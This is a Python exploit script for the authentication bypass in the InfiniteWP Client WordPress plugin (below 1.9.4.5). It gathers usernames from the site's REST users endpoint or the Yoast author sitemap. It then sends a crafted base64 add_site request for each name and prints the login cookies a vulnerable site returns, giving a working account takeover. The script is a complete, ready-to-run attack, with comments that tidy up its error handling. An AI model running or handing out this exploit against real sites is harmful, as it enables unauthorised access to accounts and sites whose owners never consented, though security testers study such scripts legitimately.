#
# InfiniteWP Client < 1.9.4.5 - Authentication Bypass
#
# Exploit Script By @random_robbie
#
# Requires a username source on the target: the WordPress REST users endpoint (/wp-json/wp/v2/users) or a Yoast SEO author sitemap (/author-sitemap.xml). The plugin check itself is only reached for usernames enumerated this way.
#
# Based off https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/
#
import requests
import json
import sys
import base64
import argparse
import re
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
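# One shared HTTP session for the whole run. Cookies that a successful login
# response sets (see test_user) are retained on it for later requests.
session = requests.Session()

parser = argparse.ArgumentParser(
    description="InfiniteWP Client < 1.9.4.5 authentication bypass: "
    "enumerate usernames, then try each against the plugin's add_site action"
)
parser.add_argument("-u", "--url", required=True, help="Wordpress URL")
# choices= lets argparse reject a bad method up front (exit 2 + usage) instead
# of the run silently doing nothing after parsing.
parser.add_argument(
    "-m",
    "--method",
    required=True,
    choices=["rest", "sitemap"],
    help="Please Use -m rest for rest api or -m sitemap for yoast seo authors site map",
)
parser.add_argument("-p", "--proxy", default="", required=False, help="Proxy for debugging")
args = parser.parse_args()

# The enumeration helpers append "/wp-json/..." and "/author-sitemap.xml";
# a trailing slash on the URL would otherwise yield "//" in the request path.
url = args.url.rstrip("/")
method = args.method

if args.proxy:
    # requests reads these environment variables by default (Session.trust_env),
    # so every request on the shared session - including the login POST - is
    # routed through the debugging proxy.
    http_proxy = args.proxy
    os.environ["HTTP_PROXY"] = http_proxy
    os.environ["HTTPS_PROXY"] = http_proxy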
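def test_user(url, user):
    """Send an InfiniteWP ``add_site`` request for *user* and report whether it logged us in.

    The body is the ``_IWP_JSON_PREFIX_`` + base64(JSON) form the client plugin
    parses; on a vulnerable install the response carries WordPress auth cookies
    for the named account, which are printed for manual reuse.

    Args:
        url: Site base URL (the plugin hooks request handling site-wide, so the
            root is POSTed to; no extra path is needed).
        user: WordPress login name / slug to try.

    Returns:
        True when a ``wordpress_logged_in`` cookie was issued, False otherwise
        (including when the request itself failed).
    """
    print("[*] Testing User " + user + " [*]")
    json_info = {"iwp_action": "add_site", "params": {"username": user}}
    encoded = base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8")
    data = "_IWP_JSON_PREFIX_{}".format(encoded)
    headers = {
        "User-Agent": "curl/7.67.0",
        "Connection": "close",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        # Bounded wait: a target that blackholes the POST must not hang the
        # whole enumeration loop that calls this function.
        response = session.post(url, data=data, headers=headers, verify=False, timeout=15)
    except requests.RequestException as exc:
        print("[-] Request to {} failed: {}".format(url, exc))
        return False

    if 'wordpress_logged_in' not in str(response.headers):
        print('[-] "wordpress_logged_in" session token not present. Exploit apparently failed.')
        return False

    # NOTE(review): this only proves a session was issued for *user*; the
    # account's role is not checked here, so "Admin" in the message is an
    # assumption - verify the role before reporting it as an admin takeover.
    print("[*] Found Admin User: " + user + " [*]")
    cookie_string = "; ".join(
        str(name) + "=" + str(value) for name, value in response.cookies.items()
    )
    if cookie_string:
        print("[+] Use Cookies to Login: \n{}".format(cookie_string))
    return True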
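def grab_users_api(url):
    """Enumerate account slugs via the WordPress REST users endpoint and try each with test_user.

    Requests ``<url>/wp-json/wp/v2/users``. A body containing
    ``rest_user_cannot_view`` or a 404 status ends the run via ``sys.exit``
    (exit codes kept as before); any other non-200 status, a non-JSON body, or
    a JSON body that is not a list is reported and the function returns without
    trying any user.

    Args:
        url: Site base URL without a trailing slash.
    """
    headers = {"User-Agent": "curl/7.54.0", "Connection": "close", "Accept": "*/*"}
    endpoint = url + "/wp-json/wp/v2/users"
    try:
        # Bounded wait so an unresponsive target cannot hang the run.
        response = session.get(endpoint, headers=headers, verify=False, timeout=15)
    except requests.RequestException as exc:
        print("[-] Request to {} failed: {}".format(endpoint, exc))
        return

    if 'rest_user_cannot_view' in response.text:
        print("[-] API Endpoint Requires Permissions\n")
        sys.exit()
    if response.status_code == 404:
        print("[-] API Endpoint returns 404 Not Found\n")
        sys.exit(0)
    if response.status_code != 200:
        print('[-] REST enum failed. Got respose code: {}'.format(response.status_code))
        return

    # A 200 is not necessarily JSON (WAF / maintenance pages), and a REST error
    # object is a dict rather than the list of user records expected below.
    try:
        users = json.loads(response.content)
    except ValueError:
        print("[-] REST enum failed. Response body was not valid JSON")
        return
    if not isinstance(users, list):
        print("[-] REST enum failed. Unexpected JSON shape: {}".format(type(users).__name__))
        return

    print("[*] Users Found [*]")
    # NOTE(review): only the page returned by this single request is walked;
    # the endpoint is presumably paginated, so sites with many accounts may
    # need ?page=/?per_page= handling - confirm against the target.
    for record in users:
        if not isinstance(record, dict) or 'slug' not in record:
            # Skip malformed entries instead of aborting the whole enumeration.
            continue
        user = str(record['slug'])
        userid = str(record.get('id'))
        print("[*] Found User: " + user + " with ID: " + userid + " [*]")
        test_user(url, user)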
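def grab_users_sitemap(url):
    """Enumerate author slugs from a Yoast SEO author sitemap and try each with test_user.

    Requests ``<url>/author-sitemap.xml`` and uses the last non-empty path
    segment of every ``<loc>`` entry as the login name (author URLs are assumed
    to end in the author slug, e.g. ``.../author/<slug>/``).

    Args:
        url: Site base URL without a trailing slash.
    """
    headers = {"User-Agent": "curl/7.54.0", "Connection": "close", "Accept": "*/*"}
    endpoint = url + "/author-sitemap.xml"
    try:
        # Bounded wait so an unresponsive target cannot hang the run.
        response = session.get(endpoint, headers=headers, verify=False, timeout=15)
    except requests.RequestException as exc:
        print("[-] Request to {} failed: {}".format(endpoint, exc))
        return

    if response.status_code == 404:
        print("[-] No Author SiteMap Found - 404 [-]")
        return
    if response.status_code != 200:
        print('[-] Sitemap enum failed. Got response code: {}'.format(response.status_code))
        return

    print("[*] Users Found [*]")
    # Match against the decoded text: a str pattern cannot be applied to the
    # bytes in response.content (TypeError under Python 3).
    for loc in re.findall(r'<loc>(.*?)</loc>\s', response.text):
        # Filter empty pieces so "scheme://host/author/slug/" and a
        # sub-directory install both resolve to the trailing slug.
        segments = [piece for piece in loc.split('/') if piece]
        if len(segments) < 3:
            # Only scheme + host (or less): not an author URL, skip it rather
            # than indexing past the end.
            continue
        realuser = segments[-1]
        test_user(url, realuser)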
# Entry point: route the selected enumeration method to its worker, which in
# turn hands every discovered username to test_user.
handlers = {"rest": grab_users_api, "sitemap": grab_users_sitemap}
handler = handlers.get(method)
if handler is None:
    print("Please Choose Method of rest or sitemap")
else:
    handler(url)